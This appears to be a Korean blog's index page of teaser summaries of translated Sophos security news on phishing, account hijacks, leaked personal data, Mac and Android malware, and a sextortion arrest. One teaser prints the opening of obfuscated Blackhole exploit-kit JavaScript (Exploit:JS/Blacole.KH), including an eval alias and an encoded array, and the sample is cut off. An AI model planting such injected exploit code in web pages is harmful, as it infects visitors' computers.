본문 바로가기

분류 전체보기

[Sophos] 분위기 고조되고 있는 피싱 공격 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=21000 피싱(Phishing)은 종종 구식으로 여겨지는데, 기술적인 관점에서, 피싱은 ‘이미 다 겪어본 것’입니다.그러나 때로는, 평범하지 않은 좀 더 흥미로운(적어도 차이가 나는) 공격을 만나게 됩니다. 이 글에서 나는 최근 몇 개월 동안 우리가 보아온 몇몇 피싱 공격에 사용된 기술들 중 하나를 간단히 살펴볼 것입니다.대부분의 피싱 공격은 다음 2가지 중 하나로 나눠집니다:이메일 메시지 본문 안에 피싱 사이트 링크를 포함한 스팸 이메일. 몇몇 경우에, 메시지 본문에 있는 링크는 사용자들을 피싱 사이트로 재연결 시키는 초기 웹페이지(보통 감염된 웹사이트에서 호스팅됨)를 가리킬지.. 더보기
[Sophos] 시리아 전자부대에 의해 해킹된 BBC Weather의 트위터 계정 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20900 자칭 시리아 전자 부대(Syrian Electronic Army)라는 해킹그룹이 BBC Weather 공식 트위터 계정을 해킹하고 보통 예상하는 전형적인 메시지인 “부분적으로 흐림.. 비올 가능성”이 아닌 몇 가지 이상한 메시지를 남겼습니다.예를 들면,북부 시리아에 위험 안개 경고: 에르도간(Erdogan, 터키 대통령)은 민간인 구역에 화학 무기를 살포하라고 테러리스트들에게 명령이나,사우디 기상청이 낙타와 정면충돌하여 다운됨등입니다.초기 메시지는 자칭 시리아 전자 부대라는 해킹그룹에 의해 BBC Weather가 해킹되었다고 주장하고 있습니다.@BBCWeather 계정의.. 더보기
[Sophos] 해커들에 의해 공개된 빌 게이츠의 SSN(사회보장번호), 주소, 신용정보 등 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20800빌 게이츠(Bill Gates)가 공개적으로 수많은 사람들의 사회보장번호(Social security numbers), 주소 및 개인 재정정보 등을 공개하는 웹사이트에 개인 정보가 공개된 가장 최신 유명인사가 되었습니다.여러 사람들 중에 킴 카다시안(Kim Kardashian)이나 미쉘 오바마(Michelle Obama), 비욘세(Beyoncé) 급에 속하는 유명인사의 개인정보 유출과 마찬가지로, 그것은 3대 신용정보 회사인 엑스페리언(Experian), 이퀴팩스(Equifax), 트랜스유니언(TransUnion)로부터 흘러나온 것처럼 보입니다.비록 FBI가 “Secret.. 더보기
[Sophos] 마이크로소프트 Digital Crimes Unit으로부터의 보안 경고로 가장한 맬웨어 공격 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20700 마이크로소프트 Digital Crimes Unit으로부터의 보안 경고로 가장한 맬웨어 공격 Windows 사용자 여러분, 여러분은 컴퓨터 보안을 진지하게 받아드리고 있나요? 만약 그렇다고 하면, 여러분은 Microsoft Digital Crimes Unit으로부터 보낸 것 같은 이메일을 받았을 때는 즉각적인 조치를 취해야 할지도 모릅니다. 하지만, 그것은 사실 큰 실수입니다. 여러분은 마이크로소프트의 DCU(Digital Crimes Unit)가 Zeus와 연관된 봇넷서버를 다운시키기 위해 열심히 작업하였고, 의심스런 맬웨어 제작자를 조사했던 사람들이었다는 것을 기억할지.. 더보기
[Sophos] 컨퍼런스에 참가하시나요? 8가지 보안 팁을 명심하세요. http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20600 이번 주는 보안업계 최고의 엔지니어들이 함께 모이는 최대의 IT 보안 행사인 RSA Conference 2013이 열립니다.비록 보안(안전)이 행사에 참여하는 모든 이의 마음속 가장 높은 곳에 자리잡고 있다는 것은 명백해 보이지만, 정보 보안 행사도 다른 행사와 마찬가지로 안전하지 않을 수 있다는 것을 북새통에 정신을 놓고 망각하기가 쉽습니다.우리는 이번 RSA 컨퍼런스나 올해 다른 컨퍼런스에 참가하는 동안 명심해야 할 8가지 보안 팁에 대한 체크리스트를 만들어 보았습니다. 공개 WiFi 네트워크를 조심하고 가능할 때 VPN을 이용하세요.만약 여러분이 암호화 되지 않은 .. 더보기
[Sophos] 자바 기반의 맬웨어에 공격당한 Apple 자사의 Mac 컴퓨터들 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20500만약 여러분이 Mac에 대한 맬웨어는 거의 없다고 여전히 생각한다면, 여러분은 쿠퍼티노(Cupertino)에 있는 꽤 유명한 과일 회사(Apple)의 보안 엔지니어와 말하기를 원할지도 모릅니다.로이터 통신에 따르면, “Apple은 최근에 해커들에 의해 공격을 받았는데, 몇 몇 종업원들의 매킨토시 컴퓨터가 감염되었다.”고 합니다.좀 더 구체적으로는, Apple 엔지니어들의 Mac OS X 노트북들이 지난주 Facebook을 공격했던 것과 동일한 제로데이(zero-day) Java 취약점에 의해 감염되었습니다.Apple이 더 루프(The Loop)에 했던 성명서에서 Apple.. 더보기
[Sophos] 중국 소수민족들을 공격하는 Mac 맬웨어 증가 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20400 작년 동안, 소포스랩은 이미 패치가 적용된 MS 오피스의 오래된 취약점을 이용하는 중국의 소수민족들에 대한 공격에 대해 이야기를 해 왔습니다.우리는 과거에 몇몇 공격들을 봐왔습니다.이번 주 초에는, 에일리언봍트(AlienVault)의 직원이 Mac OS X의 오피스 제품에서 동일한 취약점을 사용한 또 다른 공격을 봤는데, 그것은 서부 터키의 위구르(Uyghur) 족을 타깃으로 하는 것입니다.MS09-027로 알려진 그 취약점은 마이크로소프트 워드에서 원격 코드 실행을 허용하는 것이었고, 2009년 6월에 마이크로소프트에서 패치를 했었습니다.그 의미는 패치되지 않은 컴퓨터.. 더보기
Exploit:JS/Blacole.KH (Microsoft) 우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다. 우선은 배치된 코드는 다음과 같습니다. try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}} if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;} asgq=new Array (1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,11.. 더보기
[Sophos] FBI, 350명의 여성을 협박하여 그들의 웹캠에서 옷을 벋게 한 해커 공개 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20300 FBI는 페이스북 사용자의 계정을 해킹하고, 스카이프(Skype)를 통해 자신이 지켜보는 동안 수백 명의 여성들을 강제로 옷을 벋게 한 혐의로 27세 남자를 체포하였습니다.캘리포니아 글렌데일(Glendale)의 Karen 'Gary' Kazaryan이 어제 연방 컴퓨터 해킹 혐의로 체포되었습니다.법무부의 공식 발표에 따르면, Kazaryan은 피해자의 이메일과 페이스북 계정을 해킹하여 패스워드를 변경하였고, 나체사진과 반나체 사진들을 검색하였다고 합니다.게다가, Kazaryan은 피해자의 패스워드와 친구 이름, 기타 개인정보 등 피해자에 대한 다른 정보까지 빼내었습니다... 더보기
[Sophos] 사기꾼들에게 수익을 가져다 주는 가짜 Plant vs Zombie 게임과 기타 안드로이드 게임들, Google Play 스토어에 잠입 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20200 Google이 공식 안드로이드 앱 스토어에 있는 앱들을 감시하는 일을 충분히 잘하고 있을까요?사기꾼들이 돈을 벌기 위해 합법적인 게임의 명성과 평판을 악용하며, Google Play에서 공개적으로 계속 다운로드 가능하게 하는 가짜 앱의 수로 판단하자면, 그것은 아닌 것 같습니다.예를 들어, “abbaradon”이라 불리는 안드로이드 앱 개발자에 의해 만들어진 앱을 한번 살펴보시죠.(하지만, 설치하지는 마시길 바랍니다.):'Plants vs Zombies'와 'PES 2012' (Pro Evolution Soccer)를 포함해 꽤 알려진 게임들 리스트가 거기에 있습니다.'.. 더보기